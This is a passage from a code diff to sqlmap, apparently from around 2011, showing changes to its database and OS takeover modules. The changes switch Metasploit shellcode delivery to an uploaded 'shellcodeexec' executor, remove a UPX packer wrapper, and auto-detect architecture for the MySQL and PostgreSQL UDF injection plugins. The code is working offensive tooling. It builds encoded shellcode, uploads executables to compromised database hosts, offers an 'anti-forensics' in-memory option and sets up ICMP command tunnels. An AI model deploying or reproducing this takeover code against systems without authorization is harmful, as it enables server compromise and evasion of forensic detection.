self.writeFile(self.exeFilePathLocal, self.exeFilePathRemote, "binary", False)
self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename)
os.unlink(self.exeFilePathLocal)
self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote))
logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote)
if web:
self.webFileUpload(self.shellcodeexecLocal, self.shellcodeexecRemote, self.webDirectory)
else:
self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", False)
def pwn(self, goUdf=False):
if goUdf:
@ -637,7 +567,7 @@ class Metasploit:
func = self.__runMsfShellcodeRemote
else:
exitfunc = "process"
func = self.__runMsfPayloadRemote
func = self.__runMsfShellcodeRemoteViaSexec
self.__runMsfCli(exitfunc=exitfunc)
@ -650,7 +580,7 @@ class Metasploit:
if not goUdf:
time.sleep(1)
self.delRemoteFile(self.exeFilePathRemote)
self.delRemoteFile(self.shellcodeexecRemote)
def smb(self):
self.__initVars()

100
lib/takeover/upx.py
View File

@ -1,100 +0,0 @@
#!/usr/bin/env python
"""
$Id$
Copyright (c) 2006-2011 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""
import os
import stat
import time
from subprocess import PIPE
from subprocess import STDOUT
from subprocess import Popen as execute
from lib.core.common import dataToStdout
from lib.core.common import decloakToMkstemp
from lib.core.data import logger
from lib.core.data import paths
from lib.core.settings import IS_WIN
from lib.core.settings import PLATFORM
from lib.core.subprocessng import pollProcess
class UPX:
"""
This class defines methods to compress binary files with UPX (Ultimate
Packer for eXecutables).
Reference:
* http://upx.sourceforge.net
"""
def __initialize(self, srcFile, dstFile=None):
if PLATFORM == "mac":
self.__upxTemp = decloakToMkstemp("%s/upx/macosx/upx_" % paths.SQLMAP_CONTRIB_PATH)
elif PLATFORM in ( "ce", "nt" ):
self.__upxTemp = decloakToMkstemp("%s\upx\windows\upx.exe_" % paths.SQLMAP_CONTRIB_PATH, suffix=".exe")
elif PLATFORM == "posix":
self.__upxTemp = decloakToMkstemp("%s/upx/linux/upx_" % paths.SQLMAP_CONTRIB_PATH)
else:
warnMsg = "unsupported platform for the compression tool "
warnMsg += "(upx), sqlmap will continue anyway"
logger.warn(warnMsg)
self.__upxTemp = decloakToMkstemp("%s/upx/linux/upx_" % paths.SQLMAP_CONTRIB_PATH)
self.__upxPath = self.__upxTemp.name
self.__upxTemp.close() #needed for execution rights
if not IS_WIN:
os.chmod(self.__upxPath, stat.S_IXUSR)
self.__upxCmd = "%s -9 -qq %s" % (self.__upxPath, srcFile)
if dstFile:
self.__upxCmd += " -o %s" % dstFile
def pack(self, srcFile, dstFile=None):
self.__initialize(srcFile, dstFile)
logger.debug("executing local command: %s" % self.__upxCmd)
process = execute(self.__upxCmd, shell=True, stdout=PIPE, stderr=STDOUT)
dataToStdout("\r[%s] [INFO] compression in progress " % time.strftime("%X"))
pollProcess(process)
upxStdout, upxStderr = process.communicate()
if hasattr(self, '__upxTemp'):
os.remove(self.__upxTemp.name)
msg = "failed to compress the file"
if "NotCompressibleException" in upxStdout:
msg += " because you provided a Metasploit version above "
msg += "3.3-dev revision 6681. This will not inficiate "
msg += "the correct execution of sqlmap. It might "
msg += "only slow down a bit the execution"
logger.debug(msg)
elif upxStderr:
logger.warn(msg)
else:
return os.path.getsize(srcFile)
return None
def unpack(self, srcFile, dstFile=None):
pass
def verify(self, filePath):
pass
upx = UPX()

25
plugins/dbms/mysql/takeover.py
View File

@ -15,7 +15,6 @@ from lib.core.common import isTechniqueAvailable
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
@ -78,32 +77,14 @@ class Takeover(GenericTakeover):
self.udfRemoteFile = "%s/%s.%s" % (self.__datadir, self.udfSharedLibName, self.udfSharedLibExt)
def udfSetLocalPaths(self):
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
msg = "what is the back-end database management system architecture?"
msg += "\n[1] 32-bit (default)"
msg += "\n[2] 64-bit"
while True:
arch = readInput(msg, default='1')
if isinstance(arch, basestring) and arch.isdigit() and int(arch) in ( 1, 2 ):
if int(arch) == 1:
arch = 32
else:
arch = 64
break
else:
warnMsg = "invalid value, valid values are 1 and 2"
logger.warn(warnMsg)
if Backend.isOs(OS.WINDOWS):
self.udfLocalFile += "/mysql/windows/%d/lib_mysqludf_sys.dll" % arch
self.udfLocalFile += "/mysql/windows/%d/lib_mysqludf_sys.dll" % Backend.getArch()
self.udfSharedLibExt = "dll"
else:
self.udfLocalFile += "/mysql/linux/%d/lib_mysqludf_sys.so" % arch
self.udfLocalFile += "/mysql/linux/%d/lib_mysqludf_sys.so" % Backend.getArch()
self.udfSharedLibExt = "so"
def udfCreateFromSharedLib(self, udf, inpRet):

25
plugins/dbms/postgresql/takeover.py
View File

@ -9,7 +9,6 @@ See the file 'doc/COPYING' for copying permission
from lib.core.common import Backend
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
@ -40,7 +39,7 @@ class Takeover(GenericTakeover):
self.udfRemoteFile = "/tmp/%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt)
def udfSetLocalPaths(self):
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
self.getVersionFromBanner()
@ -59,29 +58,11 @@ class Takeover(GenericTakeover):
errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
raise sqlmapUnsupportedFeatureException, errMsg
msg = "what is the back-end database management system architecture?"
msg += "\n[1] 32-bit (default)"
msg += "\n[2] 64-bit"
while True:
arch = readInput(msg, default='1')
if isinstance(arch, basestring) and arch.isdigit() and int(arch) in ( 1, 2 ):
if int(arch) == 1:
arch = 32
else:
arch = 64
break
else:
warnMsg = "invalid value, valid values are 1 and 2"
logger.warn(warnMsg)
if Backend.isOs(OS.WINDOWS):
self.udfLocalFile += "/postgresql/windows/%d/%s/lib_postgresqludf_sys.dll" % (arch, majorVer)
self.udfLocalFile += "/postgresql/windows/%d/%s/lib_postgresqludf_sys.dll" % (Backend.getArch(), majorVer)
self.udfSharedLibExt = "dll"
else:
self.udfLocalFile += "/postgresql/linux/%d/%s/lib_postgresqludf_sys.so" % (arch, majorVer)
self.udfLocalFile += "/postgresql/linux/%d/%s/lib_postgresqludf_sys.so" % (Backend.getArch(), majorVer)
self.udfSharedLibExt = "so"
def udfCreateFromSharedLib(self, udf, inpRet):

16
plugins/generic/takeover.py
View File

@ -156,7 +156,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n"
errMsg += "If you miss doing that, you will receive "
errMsg += "information from the database server and it "
errMsg += "is unlikely to receive commands send from you"
errMsg += "is unlikely to receive commands sent from you"
logger.error(errMsg)
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
@ -173,7 +173,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
msg = "how do you want to execute the Metasploit shellcode "
msg += "on the back-end database underlying operating system?"
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\n[2] Stand-alone payload stager (file system way)"
msg += "\n[2] Via shellcodeexec (file system way)"
while True:
choice = readInput(msg, default=1)
@ -193,10 +193,12 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
goUdf = True
if goUdf:
self.createMsfShellcode(exitfunc="thread", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
exitfunc="thread"
else:
self.createMsfPayloadStager()
self.uploadMsfPayloadStager()
exitfunc="process"
self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
self.uploadShellcodeexec()
if Backend.isOs(OS.WINDOWS) and conf.privEsc:
if Backend.getIdentifiedDbms() == DBMS.MYSQL:
@ -239,8 +241,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
self.getRemoteTempPath()
if tunnel == 1:
self.createMsfPayloadStager()
self.uploadMsfPayloadStager(web=web)
self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
self.uploadShellcodeexec(web=web)
elif tunnel == 2:
self.uploadIcmpshSlave(web=web)
self.icmpPwn()